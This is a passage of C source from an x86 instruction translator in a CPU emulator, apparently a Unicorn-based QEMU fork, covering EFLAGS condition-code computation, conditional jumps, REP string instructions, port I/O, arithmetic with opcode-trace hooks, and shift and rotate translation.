*/ gen_update_cc_op(s); gen_helper_cc_compute_c(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_op); return (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = -1, .no_setcond = true }; } } /* compute eflags.P to reg */ static CCPrepare gen_prepare_eflags_p(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_compute_eflags(s); return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_P }; } /* compute eflags.S to reg */ static CCPrepare gen_prepare_eflags_s(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_DYNAMIC: gen_compute_eflags(s); /* FALLTHRU */ case CC_OP_EFLAGS: case CC_OP_ADCX: case CC_OP_ADOX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_S }; case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; default: { MemOp size = (s->cc_op - CC_OP_ADDB) & 3; TCGv t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, true); return (CCPrepare) { .cond = TCG_COND_LT, .reg = t0, .mask = -1 }; } } } /* compute eflags.O to reg */ static CCPrepare gen_prepare_eflags_o(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_ADOX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src2, .mask = -1, .no_setcond = true }; case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; default: gen_compute_eflags(s); return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_O }; } } /* compute eflags.Z to reg */ static CCPrepare gen_prepare_eflags_z(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_DYNAMIC: gen_compute_eflags(s); /* FALLTHRU */ case CC_OP_EFLAGS: case CC_OP_ADCX: case CC_OP_ADOX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_Z }; case CC_OP_CLR: return (CCPrepare) { .cond = TCG_COND_ALWAYS, .mask = -1 }; case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_EQ, .reg = tcg_ctx->cpu_cc_src, .mask = -1 }; default: { MemOp size = (s->cc_op - CC_OP_ADDB) & 3; TCGv t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, false); return (CCPrepare) { .cond = TCG_COND_EQ, .reg = t0, .mask = -1 }; } } } /* perform a conditional store into register 'reg' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. */ static CCPrepare gen_prepare_cc(DisasContext *s, int b, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int inv, jcc_op, cond; MemOp size; CCPrepare cc; TCGv t0; inv = b & 1; jcc_op = (b >> 1) & 7; switch (s->cc_op) { case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: /* We optimize relational operators for the cmp/jcc case. 
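       Annotation (not in the original source): e.g. "cmp eax, ebx;
       jl target" never materializes EFLAGS -- the operands saved in
       cc_srcT and cc_src feed a single signed comparison below.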
*/ size = s->cc_op - CC_OP_SUBB; switch (jcc_op) { case JCC_BE: tcg_gen_mov_tl(tcg_ctx, s->tmp4, s->cc_srcT); gen_extu(tcg_ctx, size, s->tmp4); t0 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); cc = (CCPrepare) { .cond = TCG_COND_LEU, .reg = s->tmp4, .reg2 = t0, .mask = -1, .use_reg2 = true }; break; case JCC_L: cond = TCG_COND_LT; goto fast_jcc_l; case JCC_LE: cond = TCG_COND_LE; fast_jcc_l: tcg_gen_mov_tl(tcg_ctx, s->tmp4, s->cc_srcT); gen_exts(tcg_ctx, size, s->tmp4); t0 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, true); cc = (CCPrepare) { .cond = cond, .reg = s->tmp4, .reg2 = t0, .mask = -1, .use_reg2 = true }; break; default: goto slow_jcc; } break; default: slow_jcc: /* This actually generates good code for JC, JZ and JS. */ switch (jcc_op) { case JCC_O: cc = gen_prepare_eflags_o(s, reg); break; case JCC_B: cc = gen_prepare_eflags_c(s, reg); break; case JCC_Z: cc = gen_prepare_eflags_z(s, reg); break; case JCC_BE: gen_compute_eflags(s); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_Z | CC_C }; break; case JCC_S: cc = gen_prepare_eflags_s(s, reg); break; case JCC_P: cc = gen_prepare_eflags_p(s, reg); break; case JCC_L: gen_compute_eflags(s); if (reg == tcg_ctx->cpu_cc_src) { reg = s->tmp0; } tcg_gen_shri_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, 4); /* CC_O -> CC_S */ tcg_gen_xor_tl(tcg_ctx, reg, reg, tcg_ctx->cpu_cc_src); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = CC_S }; break; default: case JCC_LE: gen_compute_eflags(s); if (reg == tcg_ctx->cpu_cc_src) { reg = s->tmp0; } tcg_gen_shri_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, 4); /* CC_O -> CC_S */ tcg_gen_xor_tl(tcg_ctx, reg, reg, tcg_ctx->cpu_cc_src); cc = (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = CC_S | CC_Z }; break; } break; } if (inv) { cc.cond = tcg_invert_cond(cc.cond); } return cc; } static void gen_setcc1(DisasContext *s, int b, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, reg); if (cc.no_setcond) { if (cc.cond == TCG_COND_EQ) { tcg_gen_xori_tl(tcg_ctx, reg, cc.reg, 1); } else { tcg_gen_mov_tl(tcg_ctx, reg, cc.reg); } return; } if (cc.cond == TCG_COND_NE && !cc.use_reg2 && cc.imm == 0 && cc.mask != 0 && (cc.mask & (cc.mask - 1)) == 0) { tcg_gen_shri_tl(tcg_ctx, reg, cc.reg, ctztl(cc.mask)); tcg_gen_andi_tl(tcg_ctx, reg, reg, 1); return; } if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, reg, cc.reg, cc.mask); cc.reg = reg; } if (cc.use_reg2) { tcg_gen_setcond_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.reg2); } else { tcg_gen_setcondi_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.imm); } } static inline void gen_compute_eflags_c(DisasContext *s, TCGv reg) { gen_setcc1(s, JCC_B << 1, reg); } /* generate a conditional jump to label 'l1' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. */ static inline void gen_jcc1_noeob(DisasContext *s, int b, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, s->T0); if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, s->T0, cc.reg, cc.mask); cc.reg = s->T0; } if (cc.use_reg2) { tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); } } /* Generate a conditional jump to label 'l1' according to jump opcode value 'b'. In the fast case, T0 is guaranted not to be used. A translation block must end soon. 
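   Annotation (not in the original source): cc_op is flushed and then
   marked DYNAMIC here because both successor paths of the branch must
   agree on how the flags state is represented.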
*/ static inline void gen_jcc1(DisasContext *s, int b, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc = gen_prepare_cc(s, b, s->T0); gen_update_cc_op(s); if (cc.mask != -1) { tcg_gen_andi_tl(tcg_ctx, s->T0, cc.reg, cc.mask); cc.reg = s->T0; } set_cc_op(s, CC_OP_DYNAMIC); if (cc.use_reg2) { tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); } } /* XXX: does not work with gdbstub "ice" single step - not a serious problem */ static TCGLabel *gen_jz_ecx_string(DisasContext *s, target_ulong next_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_op_jnz_ecx(s, s->aflag, l1); gen_set_label(tcg_ctx, l2); gen_jmp_tb(s, next_eip, 1); gen_set_label(tcg_ctx, l1); return l2; } static inline void gen_stos(DisasContext *s, MemOp ot) { gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); gen_string_movl_A0_EDI(s); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static inline void gen_lods(DisasContext *s, MemOp ot) { gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, s->T0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); } static inline void gen_scas(DisasContext *s, MemOp ot) { gen_string_movl_A0_EDI(s); gen_op_ld_v(s, ot, s->T1, s->A0); gen_op(s, OP_CMPL, ot, R_EAX); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static inline void gen_cmps(DisasContext *s, MemOp ot) { gen_string_movl_A0_EDI(s); gen_op_ld_v(s, ot, s->T1, s->A0); gen_string_movl_A0_ESI(s); gen_op(s, OP_CMPL, ot, OR_TMP0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static void gen_bpt_io(DisasContext *s, TCGv_i32 t_port, int ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->flags & HF_IOBPT_MASK) { TCGv_i32 t_size = tcg_const_i32(tcg_ctx, 1 << ot); TCGv t_next = tcg_const_tl(tcg_ctx, s->pc - s->cs_base); gen_helper_bpt_io(tcg_ctx, tcg_ctx->cpu_env, t_port, t_size, t_next); tcg_temp_free_i32(tcg_ctx, t_size); tcg_temp_free(tcg_ctx, t_next); } } static inline void gen_ins(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_string_movl_A0_EDI(s); /* Note: we must do this dummy write first to be restartable in case of page fault. 
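       Annotation (not in the original source): the throw-away store
       probes the destination page so that a potential #PF is raised
       before the port read has any side effect; the INS can then be
       restarted safely.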
*/ tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_st_v(s, ot, s->T0, s->A0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_andi_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 0xffff); gen_helper_in_func(tcg_ctx, ot, s->T0, s->tmp2_i32); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_EDI); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } static inline void gen_outs(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_andi_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 0xffff); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T0); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } } /* same method as Valgrind : we generate jumps to current or next instruction */ #define GEN_REPZ(op) \ static inline void gen_repz_ ## op(DisasContext *s, MemOp ot, \ target_ulong cur_eip, target_ulong next_eip) \ { \ TCGLabel *l2; \ gen_update_cc_op(s); \ l2 = gen_jz_ecx_string(s, next_eip); \ gen_ ## op(s, ot); \ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); \ /* a loop would cause two single step exceptions if ECX = 1 \ before rep string_insn */ \ if (s->repz_opt) \ gen_op_jz_ecx(s, s->aflag, l2); \ gen_jmp(s, cur_eip); \ } #define GEN_REPZ2(op) \ static inline void gen_repz_ ## op(DisasContext *s, MemOp ot, \ target_ulong cur_eip, \ target_ulong next_eip, \ int nz) \ { \ TCGLabel *l2; \ gen_update_cc_op(s); \ l2 = gen_jz_ecx_string(s, next_eip); \ gen_ ## op(s, ot); \ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); \ gen_update_cc_op(s); \ gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2); \ if (s->repz_opt) \ gen_op_jz_ecx(s, s->aflag, l2); \ gen_jmp(s, cur_eip); \ } GEN_REPZ(movs) GEN_REPZ(stos) GEN_REPZ(lods) GEN_REPZ(ins) GEN_REPZ(outs) GEN_REPZ2(scas) GEN_REPZ2(cmps) static void gen_helper_fp_arith_ST0_FT0(TCGContext *tcg_ctx, int op) { switch (op) { case 0: gen_helper_fadd_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_fmul_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 2: gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 3: gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: gen_helper_fsub_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: gen_helper_fsubr_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 6: gen_helper_fdiv_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 7: gen_helper_fdivr_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; } } /* NOTE the exception in "r" op ordering */ static void gen_helper_fp_arith_STN_ST0(TCGContext *tcg_ctx, int op, int opreg) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, opreg); switch (op) { case 0: gen_helper_fadd_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_fmul_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 4: gen_helper_fsubr_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 5: gen_helper_fsub_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 6: gen_helper_fdivr_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; case 7: gen_helper_fdiv_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tmp); break; } } static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; 
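    /* Annotation (not in the original source): cc_op and EIP are synced
       to env first because raise_exception exits the TB via longjmp and
       would otherwise lose the lazily computed state. */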
gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, trapno)); s->base.is_jmp = DISAS_NORETURN; } /* Generate #UD for the current instruction. The assumption here is that the instruction is known, but it isn't allowed in the current cpu mode. */ static void gen_illegal_opcode(DisasContext *s) { gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base); } /* if d == OR_TMP0, it means memory operand (address in A0) */ static void gen_op(DisasContext *s1, int op, MemOp ot, int d) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; uc_engine *uc = s1->uc; /* Invalid lock prefix when destination is not memory or OP_CMPL. */ if ((d != OR_TMP0 || op == OP_CMPL) && s1->prefix & PREFIX_LOCK){ gen_illegal_opcode(s1); return; } if (d != OR_TMP0) { gen_op_mov_v_reg(s1, ot, s1->T0, d); } else if (!(s1->prefix & PREFIX_LOCK)) { gen_op_ld_v(s1, ot, s1->T0, s1->A0); } switch(op) { case OP_ADCL: gen_compute_eflags_c(s1, s1->tmp4); if (s1->prefix & PREFIX_LOCK) { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->tmp4, s1->T1); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->tmp4); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update3_cc(s1, s1->tmp4); set_cc_op(s1, CC_OP_ADCB + ot); break; case OP_SBBL: gen_compute_eflags_c(s1, s1->tmp4); if (s1->prefix & PREFIX_LOCK) { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T1, s1->tmp4); tcg_gen_neg_tl(tcg_ctx, s1->T0, s1->T0); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->tmp4); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update3_cc(s1, s1->tmp4); set_cc_op(s1, CC_OP_SBBB + ot); break; case OP_ADDL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_add_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update2_cc(s1); set_cc_op(s1, CC_OP_ADDB + ot); break; case OP_SUBL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_neg_tl(tcg_ctx, s1->T0, s1->T1); tcg_gen_atomic_fetch_add_tl(tcg_ctx, s1->cc_srcT, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->cc_srcT, s1->T1); } else { tcg_gen_mov_tl(tcg_ctx, s1->cc_srcT, s1->T0); tcg_gen_sub_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, s1->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && (hook->op_flags & UC_TCG_OP_FLAG_DIRECT) ) { // TCGv is just an offset to tcg_ctx so it's safe to do so. 
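                        // Annotation (not in the original source): TCGv_i32 and
                        // TCGv_i64 values index the same temporary storage, so the
                        // cast only changes the static type seen by the helper.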
gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)s1->T0, (TCGv_i64)s1->T1, 1 << ((ot & MO_SIZE) + 3), uc, s1->pc_start); } } } gen_op_update2_cc(s1); set_cc_op(s1, CC_OP_SUBB + ot); break; default: case OP_ANDL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_and_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_and_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_ORL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_or_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_or_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_XORL: if (s1->prefix & PREFIX_LOCK) { tcg_gen_atomic_xor_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T1, s1->mem_index, ot | MO_LE); } else { tcg_gen_xor_tl(tcg_ctx, s1->T0, s1->T0, s1->T1); gen_op_st_rm_T0_A0(s1, ot, d); } gen_op_update1_cc(s1); set_cc_op(s1, CC_OP_LOGICB + ot); break; case OP_CMPL: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s1->T1); tcg_gen_mov_tl(tcg_ctx, s1->cc_srcT, s1->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1->T0, s1->T1); if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, s1->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && (hook->op_flags & UC_TCG_OP_FLAG_CMP) ) { // TCGv is just an offset to tcg_ctx so it's safe to do so. gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)s1->T0, (TCGv_i64)s1->T1, 1 << ((ot & MO_SIZE) + 3), uc, s1->pc_start); } } } set_cc_op(s1, CC_OP_SUBB + ot); break; } } /* if d == OR_TMP0, it means memory operand (address in A0) */ static void gen_inc(DisasContext *s1, MemOp ot, int d, int c) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; if (s1->prefix & PREFIX_LOCK) { if (d != OR_TMP0) { /* Lock prefix when destination is not memory */ gen_illegal_opcode(s1); return; } tcg_gen_movi_tl(tcg_ctx, s1->T0, c > 0 ? 1 : -1); tcg_gen_atomic_add_fetch_tl(tcg_ctx, s1->T0, s1->A0, s1->T0, s1->mem_index, ot | MO_LE); } else { if (d != OR_TMP0) { gen_op_mov_v_reg(s1, ot, s1->T0, d); } else { gen_op_ld_v(s1, ot, s1->T0, s1->A0); } tcg_gen_addi_tl(tcg_ctx, s1->T0, s1->T0, (c > 0 ? 1 : -1)); gen_op_st_rm_T0_A0(s1, ot, d); } gen_compute_eflags_c(s1, tcg_ctx->cpu_cc_src); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1->T0); set_cc_op(s1, (c > 0 ? CC_OP_INCB : CC_OP_DECB) + ot); } static void gen_shift_flags(DisasContext *s, MemOp ot, TCGv result, TCGv shm1, TCGv count, bool is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 z32, s32, oldop; TCGv z_tl; /* Store the results into the CC variables. If we know that the variable must be dead, store unconditionally. Otherwise we'll need to not disrupt the current contents. */ z_tl = tcg_const_tl(tcg_ctx, 0); if (cc_op_live[s->cc_op] & USES_CC_DST) { tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_dst, count, z_tl, result, tcg_ctx->cpu_cc_dst); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, result); } if (cc_op_live[s->cc_op] & USES_CC_SRC) { tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_src, count, z_tl, shm1, tcg_ctx->cpu_cc_src); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, shm1); } tcg_temp_free(tcg_ctx, z_tl); /* Get the two potential CC_OP values into temporaries. */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, (is_right ? 
CC_OP_SARB : CC_OP_SHLB) + ot); if (s->cc_op == CC_OP_DYNAMIC) { oldop = tcg_ctx->cpu_cc_op; } else { tcg_gen_movi_i32(tcg_ctx, s->tmp3_i32, s->cc_op); oldop = s->tmp3_i32; } /* Conditionally store the CC_OP value. */ z32 = tcg_const_i32(tcg_ctx, 0); s32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, s32, count); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_op, s32, z32, s->tmp2_i32, oldop); tcg_temp_free_i32(tcg_ctx, z32); tcg_temp_free_i32(tcg_ctx, s32); /* The CC_OP value is no longer predictable. */ set_cc_op(s, CC_OP_DYNAMIC); } static void gen_shift_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right, int is_arith) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, mask); tcg_gen_subi_tl(tcg_ctx, s->tmp0, s->T1, 1); if (is_right) { if (is_arith) { gen_exts(tcg_ctx, ot, s->T0); tcg_gen_sar_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_sar_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shr_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->T1); } } else { tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, s->T1); } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); gen_shift_flags(s, ot, s->T0, s->tmp0, s->T1, is_right); } static void gen_shift_rm_im(DisasContext *s, MemOp ot, int op1, int op2, int is_right, int is_arith) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ot == MO_64 ? 0x3f : 0x1f); /* load */ if (op1 == OR_TMP0) gen_op_ld_v(s, ot, s->T0, s->A0); else gen_op_mov_v_reg(s, ot, s->T0, op1); op2 &= mask; if (op2 != 0) { if (is_right) { if (is_arith) { gen_exts(tcg_ctx, ot, s->T0); tcg_gen_sari_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, op2); } else { gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shri_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, op2); } } else { tcg_gen_shli_tl(tcg_ctx, s->tmp4, s->T0, op2 - 1); tcg_gen_shli_tl(tcg_ctx, s->T0, s->T0, op2); } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); /* update eflags if non zero shift */ if (op2 != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp4); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); set_cc_op(s, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); } } static void gen_rot_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 0x3f : 0x1f); TCGv_i32 t0, t1; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, mask); switch (ot) { case MO_8: /* Replicate the 8-bit input so that a 32-bit rotate works. */ tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_muli_tl(tcg_ctx, s->T0, s->T0, 0x01010101); goto do_long; case MO_16: /* Replicate the 16-bit input so that a 32-bit rotate works. 
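           E.g. a 16-bit rotate left of 0xABCD by 4 becomes a 32-bit rotate
           of 0xABCDABCD, giving 0xBCDABCDA, whose low half 0xBCDA is the
           correct 16-bit result.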
*/ tcg_gen_deposit_tl(tcg_ctx, s->T0, s->T0, s->T0, 16, 16); goto do_long; do_long: #ifdef TARGET_X86_64 case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); if (is_right) { tcg_gen_rotr_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); } else { tcg_gen_rotl_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); } tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); break; #endif default: if (is_right) { tcg_gen_rotr_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { tcg_gen_rotl_tl(tcg_ctx, s->T0, s->T0, s->T1); } break; } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); /* We'll need the flags computed into CC_SRC. */ gen_compute_eflags(s); /* The value that was "rotated out" is now present at the other end of the word. Compute C into CC_DST and O into CC_SRC2. Note that since we've computed the flags into CC_SRC, these variables are currently dead. */ if (is_right) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask - 1); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, 